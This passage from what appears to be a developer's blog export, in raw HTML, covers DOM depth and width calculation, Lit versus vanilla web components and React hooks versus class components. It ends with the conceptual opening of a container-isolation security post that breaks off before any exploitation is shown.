data-selectable-paragraph="" id="cd9b" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span class="jg ii" style="box-sizing: inherit; font-weight: 700;"><em class="ku" style="box-sizing: inherit;"></em></span></p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="801e" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">We can calculate the DOM depth and width of an entire tree or from a particular element or node. Below is the logic to find the depth and width of a DOM element. This logic is based out of the implementation from google lighthouse.</p><p><script src="https://gist.github.com/ramkrivas/430db72f0c86363ea9648bb95de3e030.js"></script></p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="801e" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><br /></p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="68a9" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">The above function accepts two parameters. The first parameter “element” defines the starting element for the calculation. by default it will take “body” element, but you can pass any particular element from where you need to start calculate the DOM width and depth.</p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="1048" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span class="jg ii" style="box-sizing: inherit; font-weight: 700;">Calculate DOM width and depth for ShadowDOM</span></p><blockquote class="kr ks kt" style="background-color: white; box-shadow: rgb(41, 41, 41) 3px 0px 0px 0px inset; box-sizing: inherit; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; margin: 0px 0px 0px -20px; padding-left: 23px;"><p class="je jf ku jg b jh ji jj jk jl jm jn jo kv jq jr js kw ju jv jw kx jy jz ka kb ia gi" data-selectable-paragraph="" id="f3d1" style="box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">The <span class="jg ii" style="box-sizing: inherit; font-weight: 700;">Shadow DOM</span> allows hidden trees to be attached in the regular DOM tree. it starts with a shadow root, underneath we can have any number of element.</p></blockquote><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="b7d5" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">The above function can be used to include shadowDOM elements also while calculating the depth and width of the tree. This can be achieved by passing the parameter “deep =true”.</p><pre class="kd ke kf kg fz ma bt mb" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gi ky kz ih mc b dn md me l mf" data-selectable-paragraph="" id="f15f" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">console.log(getDomStatus(document.body, true));// Includes shadowDOM</span><span class="gi ky kz ih mc b dn mg mh mi mj mk me l mf" data-selectable-paragraph="" id="68b2" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">The sample result will be :</span></pre><figure class="kd ke kf kg fz kh fn fo paragraph-image" style="background-color: white; box-sizing: inherit; clear: both; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; margin: 56px auto 0px;"><div class="fn fo ml" style="box-sizing: inherit; margin-left: auto; margin-right: auto; max-width: 484px;"><img alt="" class="cf km kn" height="87" loading="lazy" role="presentation" src="https://miro.medium.com/max/968/1*pp9uCIcDybqiHQ-kW9-RUw.png" style="box-sizing: inherit; height: auto; max-width: 100%; vertical-align: middle; width: 484px;" width="484" /></div><figcaption class="ko bm fp fn fo kp kq bn b bo bp co" data-selectable-paragraph="" style="box-sizing: inherit; color: #757575; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-left: auto; margin-right: auto; margin-top: 10px; max-width: 728px; text-align: center;">sample result from above function.</figcaption></figure><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="2a99" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Now, you understood the concept of DOM depth and width and what is the logic to calculate the size of it (including shadowDOM). You can use this function in your integration or unit tests to ensure your page or web component DOM tree size is not exceeding the optimal limit.</p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="24f5" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Thanks for reading !.</p> <p></p> <p></p>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-17227863824131285992022-04-24T14:30:00.002+05:302022-05-06T23:14:00.371+05:30Native web components vs Lit element: The key practical differences<p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="9638" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">To cope with the faster development of different front-end frameworks. Always there is a clear need that the UI we develop is should be framework agnostic, not fall into a trap of particular framework-based (Angular/React/Vue) implementation. Here is where the reusable HTML web components help in our product designs.</p><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="1156" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">There is quite some way to develop shareable web components. Here in this article, I will mainly discuss the “<span class="jh ij" style="box-sizing: inherit; font-weight: 700;">Lit element</span>” based web component and how it differs from a “<span class="jh ij" style="box-sizing: inherit; font-weight: 700;">vanilla/native w3c standard custom web component</span>” development.</p><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="3ff0" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Let us first quickly understand about these two approaches before doing deep comparison.</p><h2 class="kd ke ii bn kf kg kh ki kj kk kl km kn jq ko kp kq ju kr ks kt jy ku kv kw kx gj" data-selectable-paragraph="" id="ad2f" style="background-color: white; box-sizing: inherit; color: #292929; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 2.37em 0px -0.31em;">LIT web component</h2><p class="pw-post-body-paragraph jf jg ii jh b ji ky jk jl jm kz jo jp jq la js jt ju lb jw jx jy lc ka kb kc ib gj" data-selectable-paragraph="" id="f6a3" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span class="jh ij" style="box-sizing: inherit; font-weight: 700;">Lit </span>the word is derived from one of the ES6 features called the “template <span class="jh ij" style="box-sizing: inherit; font-weight: 700;">LIT</span>eral” function and that is the basis for the entire Lit rendering engine framework. Lit is lightweight library for building and supports simple API for web component managing tasks like managing properties, attributes, rendering..etc.</p><h2 class="kd ke ii bn kf kg kh ki kj kk kl km kn jq ko kp kq ju kr ks kt jy ku kv kw kx gj" data-selectable-paragraph="" id="b3c3" style="background-color: white; box-sizing: inherit; color: #292929; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 2.37em 0px -0.31em;">Vanilla web component</h2><p><span style="background-color: white; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em;">Vanilla/native web components can be created by extending the native HTMLElement class and registering to the browser by calling customElements.define API.</span></p><p><br /></p><p><span style="background-color: white; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.063px;">As we know, we can achieve a custom web component from either a vanilla web component or a LIT-based component. But below are key features highlights which approach makes a developer’s life easier, and produce less code, easy maintenance, and better performance.</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4RaD7qnj0SugozlDSOHm_AnPHgQJsb9cxtg3s1z1_aroo-7P-XodRDSMrazOJND5Az8ZPyfHOuDp0NsGSedzednzuXdr4j9uWlbNqjhKFWQhEimqc23oKxcuxA1qyQRRXza7D8BWi5HcYFC25VjA-JUvFEk8rvtJwxSag6m-5UkSwqTk1MKU-1ZnM/s1262/wecomponent.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="671" data-original-width="1262" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4RaD7qnj0SugozlDSOHm_AnPHgQJsb9cxtg3s1z1_aroo-7P-XodRDSMrazOJND5Az8ZPyfHOuDp0NsGSedzednzuXdr4j9uWlbNqjhKFWQhEimqc23oKxcuxA1qyQRRXza7D8BWi5HcYFC25VjA-JUvFEk8rvtJwxSag6m-5UkSwqTk1MKU-1ZnM/w640-h340/wecomponent.png" width="640" /></a></div><br /><span style="background-color: white; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.063px;"><br /></span><p></p><br /><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="a803" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Let us do comparison with key functionalities for managing web component.</p><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="589b" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Coding syntax</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="23eb" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=> </span>Imperative<br style="box-sizing: inherit;" />Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Declarative</span></pre><p></p><p> <span style="background-color: white; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em;">Rendering Template</span></p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="359a" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> JS InnerHtml binding Or <template> cloning nodes</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="de5c" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Lit Template (Tagged Template Literals functions)</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="74d6" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Lifecycle hooks</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="c5eb" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> constructor, connectedCallback disconnectedCallback, attributeChangedCallback, adoptedCallback</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="2e1c" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Lit introduces a set of render lifecycle callback methods on top of the native Web Component callbacks</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="8b7f" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Styles/ CSS</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="cedd" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Normal CSS stylesheet </span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="597c" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Constructable stylesheet</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="c993" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">ShadowDOM</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="83c1" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Yes, Supported</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="e557" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Yes, supported</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="e58f" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Property Binding</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="b05d" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Achieved by getter / setter properties</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="b6cb" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Lit handles it as part of reactive lifecycle</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="b1de" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Attribute Binding</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="df2e" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Achieved with attributedChangedCallback</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="a3b7" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=></span> Lit handles it as part reactive lifecycle</span></pre><p class="pw-post-body-paragraph jf jg ii jh b ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb kc ib gj" data-selectable-paragraph="" id="6771" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Event listeners</p><pre class="ll lm ln lo ga lz bt ma" style="background: rgb(242, 242, 242); box-sizing: inherit; color: rgba(0, 0, 0, 0.8); margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 20px;"><span class="gj kd ke ii mb b do mc md l me" data-selectable-paragraph="" id="cd8a" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: -0.09em; white-space: pre-wrap;">Vanilla Web Component <span class="mb ij" style="box-sizing: inherit; font-weight: 700;">=> </span>Event listener needs to be initialized programmatically in the connectedCallback and diconnectedCallback lifecycle.</span><span class="gj kd ke ii mb b do mf mg mh mi mj md l me" data-selectable-paragraph="" id="f1c5" style="box-sizing: inherit; color: #292929; display: block; font-family: Menlo, Monaco, "Courier New", Courier, monospace; font-size: 16px; letter-spacing: -0.022em; line-height: 1.18; margin-bottom: -0.09em; margin-top: 1.91em; white-space: pre-wrap;">Lit Element<span class="mb ij" style="box-sizing: inherit; font-weight: 700;"> => </span>In lit templates supports adding event listener to node with <a class="au mk" href="http://twitter.com/EVENT_NAME" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">@EVENT_NAME</a> binding syntax.</span></pre><br /><br /><br />Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-84733483226902680252022-02-17T16:13:00.001+05:302022-02-17T16:13:31.074+05:30React/Redux hooks Vs equivalent implementation in React class feature<p>I am writing this article as an attempt to challenge myself to do a deep dive comparison between react/redux hooks used in functional component vs the equivalent implementation in react class component.</p><blockquote class="graf graf--blockquote" name="2a73">Note: I could not find equivalent class feature implementation for all the hooks. But I tried to the maximum which I can.</blockquote><p>In this article, we will discuss the below list of mapping b/w react & redux hooks and it is equivalent implementation in class components. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjj3wY2L4SgBoyPdqDMtTJjodTZW0mlRr9fmC0B2Hd9xDScPfU-f38wHuZcMUkFy-nbaq9-JNTsOcx2LI3LDp5AVaDMOjhssvzQhqg4sd2ovUMY4dIb_F8f7AIs3FSYYh1nfvCm_TcomSwo9dXH3now1D-nGVh0A_YL94v8r9hYjrcUsyFMlVMeg4kO=s631" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="631" height="398" src="https://blogger.googleusercontent.com/img/a/AVvXsEjj3wY2L4SgBoyPdqDMtTJjodTZW0mlRr9fmC0B2Hd9xDScPfU-f38wHuZcMUkFy-nbaq9-JNTsOcx2LI3LDp5AVaDMOjhssvzQhqg4sd2ovUMY4dIb_F8f7AIs3FSYYh1nfvCm_TcomSwo9dXH3now1D-nGVh0A_YL94v8r9hYjrcUsyFMlVMeg4kO=w640-h398" width="640" /></a></div><div><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><i>React and Redux hooks Vs class feature mappings</i></div><div><br /></div><h2 class="graf graf--h3" name="d603">useState hook Vs equivalent implementation in class Component</h2><p><br /><script src="https://gist.github.com/ramkrivas/c44a19a482a1c4acbe6573a0e5a1503d.js"></script></p>
<h2 class="graf graf--h3" name="d603">useEffect hook Vs equivalent implementation in class component</h2><p><br /><script src="https://gist.github.com/ramkrivas/8f8503c759e5bf448353c41041c7f6dc.js"></script></p>
<h2 class="graf graf--h3" name="d603">useRef hook Vs equivalent implementation in class Component</h2><p><br /><script src="https://gist.github.com/ramkrivas/3ad8acaaf71a83cf1930862945f8661a.js"></script></p>
<h2 class="graf graf--h3" name="d603">useMemo hook Vs equivalent implementation in class component</h2><p><br /><script src="https://gist.github.com/ramkrivas/83a1fe3c1bf8f1e5193617c848677994.js"></script></p>
<h2 class="graf graf--h3" name="d603">useSelector redux hook Vs redux Connect (mapStateToProps)</h2><p><br /><script src="https://gist.github.com/ramkrivas/a049a6f21843e6b3113ec778726e4bf4.js"></script></p>
<h2 class="graf graf--h3" name="d603">useDispatch redux hook Vs redux Connect(mapDispatchToProps)</h2><p><br /><script src="https://gist.github.com/ramkrivas/be112e269a7d0833ff612bef1efc6d11.js"></script></p>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-70803819453622238952021-09-26T17:57:00.006+05:302022-02-06T19:33:02.632+05:30Container Security - Learn with exploiting the weakness<span style="font-family: inherit;"><span>In our container environment, the moment we started thinking about protecting containers with the right security practices then the first buzz word would come in all our minds is "isolation". </span><br />
<span><br /></span>
<span> You are right !, In container security, the real buzzword is "isolation". The more you isolate container runtime from a container Host, the more you isolate one container from another container then the security is almost there.
To bring these "isolation", the docker as a framework by default supports some of the isolation practices such as </span><br />
</span><ul>
<li><span style="font-family: inherit;"> Docker Namespace </span></li>
<li><span style="font-family: inherit;"> Cgroups </span></li>
<li><span style="font-family: inherit;"> Kernel capabilities. </span></li></ul><span style="font-family: inherit;">
<span>Docker namespace brings much isolation by providing namespace separation for "process"," mount", "network stack", etc., etc. For example with the docker process namespace, the isolation is provided between the process in the container and the process in the host. The process in the host will have a different process ID, and the same process inside the container will have a different process ID. The processes in running in a host cannot be accessed inside the container and vice versa. This way docker provides isolation of one container is not disturbing other container and also not disturbing the host. </span><br />
<span><br /></span>
<span>CGroups is another key component that supports isolation in docker. They implement resource accounting and limiting. They provide many useful metrics, but they also help ensure that each container gets its fair share of memory, CPU, disk I/O; and, more importantly, that a single container cannot bring the system down by exhausting one of those resources. </span><br />
<span><br /></span>
<span>If we take Kernel capabilities, the docker by default restricts the set of kernel capabilities within the container. For example, the root user in the docker Host will NOT have all the capabilities inside the docker container.</span><br />
<span><br /></span>
</span><div style="margin: 0in;">
<span style="font-family: inherit;">Along with the aforementioned isolation practices, we will look at some of the docker secure
practices which docker and Linux Kernel support.</span></div>
<span style="font-family: inherit;"><br />
</span><div style="margin: 0in;">
<span style="font-family: inherit;">Below is the list of container secure practices, we will discuss in this article. Also, according to me if we want to learn how to protect something we should first be knowing how to break it too. Let's do our learning with easy exploitation practice on some of the container security weaknesses in the docker environment.</span></div>
<div style="margin: 0in;">
<span style="font-family: Georgia, Times New Roman, serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
